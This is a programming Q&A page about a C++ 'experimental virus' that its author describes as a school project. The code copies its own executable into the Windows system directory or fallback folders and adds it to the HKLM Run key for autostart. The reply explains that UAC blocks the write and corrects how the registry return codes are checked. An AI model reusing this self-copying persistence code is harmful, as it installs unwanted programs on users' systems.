CODEWITHSUNDEEP
c++winapiregistryvirus
legionar
legionar

Reputation: 75

Unable to write to registry

I'm writing an experimental virus for my school project. It should copy itself, start itself.. I started with this article, and I came to this:

#include <windows.h>
#include <iostream>
#include <tchar.h>
#include <stdio.h>
using namespace std;

void main()
{
wchar_t system[MAX_PATH];
wchar_t user[MAX_PATH];
wchar_t pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
DWORD  bufSize = MAX_PATH;

GetModuleFileName(GetModH, pathtofile, sizeof(pathtofile));
GetSystemDirectory(system, sizeof(system));

std::wstring s(system);
s += std::wstring(L"\\virus.exe");
WCHAR* sysfull = &s[0];

if(!CopyFile(pathtofile, sysfull, false))
{
    sysfull = L"C:\\Users\\Public\\virus.exe";
    if(!CopyFile(pathtofile, sysfull, false))
    {
        GetUserName(user, &bufSize);
        std::wstring u(L"C:\\Users\\");
        u += std::wstring(user);
        u += std::wstring(L"\\Documents\\virus.exe");
        sysfull = &u[0];
        CopyFile(pathtofile, sysfull, false);
    }
}

HKEY hKey;

bool t = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
bool t1 = RegSetValueEx(hKey, L"Writing to the Registry Example", 0, REG_SZ, (const unsigned char*)sysfull, sizeof(system));
RegCloseKey(hKey);

MessageBox(NULL,L"Hello",L"Messagebox Example",MB_OK);
}

The problem is when I look in regedit under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run there is no new key. RegOpenKeyEx and RegSetValueEx return true, and everything seems to be working fine, but it isn't, and I have no idea why.

I'm on Windows 8 and using VS12.

Upvotes: 0

Views: 1291

Answers (1)

Jonathan Potter
Jonathan Potter

Reputation: 37192

Windows Vista and later block write access to certain sensitive locations like the HKEY_LOCAL_MACHINE_KEY, C:\Windows, etc, via a mechanism known as UAC. If UAC is enabled (which it is, by default), admin-level users by default have a reduced set of privileges and programs need to use a technique known as elevation to gain full administrator privileges. Alternatively, you can launch your program as administrator via the right-click menu to give it full access.

Either way, with UAC turned on the user needs to approve the elevation via a dialog before the permissions are granted.

The registry functions like RegOpenKeyEx() return 0 on success, and an error code on failure - not true/false. If you check the return code properly you'll see they're returning 5 which is ERROR_ACCESS_DENIED.

Upvotes: 1

Related Questions